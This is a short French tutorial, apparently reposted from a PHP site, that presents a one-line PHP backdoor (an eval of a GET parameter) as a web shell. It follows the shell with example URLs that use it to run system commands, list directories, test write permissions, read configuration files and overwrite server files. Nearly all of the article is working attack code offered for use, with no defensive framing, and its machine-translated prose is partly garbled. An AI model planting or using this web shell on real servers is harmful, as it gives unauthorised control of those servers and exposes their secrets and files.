Maison  >  Article  >  développement back-end  >  Quelques utilisations de la porte dérobée PHP

Quelques utilisations de la porte dérobée PHP

藏色散人
藏色散人avant
2019-06-05 15:17:377023parcourir

Aujourd'hui, nous allons parler de certaines des utilisations les plus courantes des portes dérobées en PHP.

Tout d'abord, écrivez la porte dérobée la plus simple, qui peut également être appelée cheval de Troie.

<?php eval($_GET[&#39;evl&#39;]);

Ça y est, vous avez gagné beaucoup de permissions d'exécution sur ce serveur.

Quelles sont les utilisations de cette scène ?

Serveur d'impressionphpinfo

http://www.test.com/a.php?evl=phpinfo()

Vérifiez quels fichiers se trouvent dans un répertoire

http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));

Vérifiez si le répertoire est accessible en écriture, puis vous pourrez vérifier l'écriture Créer un fichier exécutable dans le répertoire

http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));

Récupérer le contenu d'un fichier, généralement utilisé pour lire la configuration

http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));

Écrire des fichiers dans un répertoire inscriptible

http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));

D'accord, ce qui précède part a fondamentalement détruit la partie qui peut compléter la visualisation d'un serveur. Essayons de tirer des conclusions sur d'autres fonctions.

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Déclaration:
Cet article est reproduit dans:. en cas de violation, veuillez contacter admin@php.cn Supprimer